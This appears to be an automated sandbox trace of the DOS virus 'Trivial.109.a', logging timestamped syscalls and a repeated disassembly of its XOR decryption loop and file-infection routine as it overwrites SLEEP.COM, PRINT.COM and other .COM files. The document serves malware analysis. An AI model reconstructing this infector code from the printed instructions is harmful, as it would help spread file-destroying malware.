Sample viewer

vx.netlux.org/Virus.DOS.Trivial.109.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:07:41.536145766Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x177
0x12a63: mov cx, 0x5b
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167
0x12a79: int 0x21
0x12a7b: jb 0x12aa3
0x12a7d: mov ax, 0x3d01
0x12a80: mov dx, 0x9e
0x12a83: int 0x21
0x12a85: xchg ax, bx
0x12a86: mov ah, 0x40
2018-12-17T23:07:41.539595787Z 78 PC: 12a7b | Find first file
2018-12-17T23:07:41.545501315Z 61 PC: 12a85 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:07:41.55169776Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.558439748Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.56114992Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.57434435Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x177
0x12a63: mov cx, 0x5b
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167
0x12a79: int 0x21
0x12a7b: jb 0x12aa3
0x12a7d: mov ax, 0x3d01
0x12a80: mov dx, 0x9e
0x12a83: int 0x21
0x12a85: xchg ax, bx
0x12a86: mov ah, 0x40
2018-12-17T23:07:41.576752337Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.57918331Z 61 PC: 12a85 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:07:41.58532326Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.591538731Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.594333608Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.60273657Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x177
0x12a63: mov cx, 0x5b
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167
0x12a79: int 0x21
0x12a7b: jb 0x12aa3
0x12a7d: mov ax, 0x3d01
0x12a80: mov dx, 0x9e
0x12a83: int 0x21
0x12a85: xchg ax, bx
0x12a86: mov ah, 0x40
2018-12-17T23:07:41.604941624Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.608710897Z 61 PC: 12a85 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:07:41.615069243Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.621381328Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.624500968Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.632068676Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x177
0x12a63: mov cx, 0x5b
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167
0x12a79: int 0x21
0x12a7b: jb 0x12aa3
0x12a7d: mov ax, 0x3d01
0x12a80: mov dx, 0x9e
0x12a83: int 0x21
0x12a85: xchg ax, bx
0x12a86: mov ah, 0x40
2018-12-17T23:07:41.634085175Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.637062997Z 61 PC: 12a85 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:07:41.643442253Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.649892308Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.652874562Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.660460682Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x177
0x12a63: mov cx, 0x5b
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167
0x12a79: int 0x21
0x12a7b: jb 0x12aa3
0x12a7d: mov ax, 0x3d01
0x12a80: mov dx, 0x9e
0x12a83: int 0x21
0x12a85: xchg ax, bx
0x12a86: mov ah, 0x40
2018-12-17T23:07:41.662543094Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.665503934Z 61 PC: 12a85 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:07:41.672653692Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.679195315Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.682510921Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.689863445Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x177
0x12a63: mov cx, 0x5b
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167
0x12a79: int 0x21
0x12a7b: jb 0x12aa3
0x12a7d: mov ax, 0x3d01
0x12a80: mov dx, 0x9e
0x12a83: int 0x21
0x12a85: xchg ax, bx
0x12a86: mov ah, 0x40
2018-12-17T23:07:41.691893153Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.694823222Z 61 PC: 12a85 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:07:41.701191638Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.707462532Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.710575844Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.718003925Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x177
0x12a63: mov cx, 0x5b
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167
0x12a79: int 0x21
0x12a7b: jb 0x12aa3
0x12a7d: mov ax, 0x3d01
0x12a80: mov dx, 0x9e
0x12a83: int 0x21
0x12a85: xchg ax, bx
0x12a86: mov ah, 0x40
2018-12-17T23:07:41.720129369Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.723206714Z 61 PC: 12a85 | Open file (Filename = 'PAH.COM')
2018-12-17T23:07:41.729476864Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.736465176Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.739561808Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.748228913Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x177
0x12a63: mov cx, 0x5b
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167
0x12a79: int 0x21
0x12a7b: jb 0x12aa3
0x12a7d: mov ax, 0x3d01
0x12a80: mov dx, 0x9e
0x12a83: int 0x21
0x12a85: xchg ax, bx
0x12a86: mov ah, 0x40
2018-12-17T23:07:41.750682243Z 79 PC: 12a7b | Find next file
2018-12-17T23:07:41.753499992Z 61 PC: 12a85 | Open file (Filename = 'TEST.COM')
2018-12-17T23:07:41.760964649Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T23:07:41.763674516Z 64 PC: 12a9a | Write file or device (Write 91 bytes on handle 5)
2018-12-17T23:07:41.766191107Z 62 PC: 12a9e | Close file
2018-12-17T23:07:41.774253213Z 44 PC: 12a59 | Get time 0x12a59: mov byte ptr [0x109], dl
0x12a5d: mov si, 0x112
0x12a60: mov di, 0x177
0x12a63: mov cx, 0x5b
0x12a66: lodsb al, byte ptr [si]
0x12a67: xor al, byte ptr [0x109]
0x12a6b: stosb byte ptr es:[di], al
0x12a6c: dec cx
0x12a6d: cmp cx, -1
0x12a70: jne 0x12a66
0x12a72: pop ax
0x12a73: mov cx, 0
0x12a76: mov dx, 0x167
0x12a79: int 0x21
0x12a7b: jb 0x12aa3
0x12a7d: mov ax, 0x3d01
0x12a80: mov dx, 0x9e
0x12a83: int 0x21
0x12a85: xchg ax, bx
0x12a86: mov ah, 0x40
2018-12-17T23:07:41.776431674Z 79 PC: 12a7b | Find next file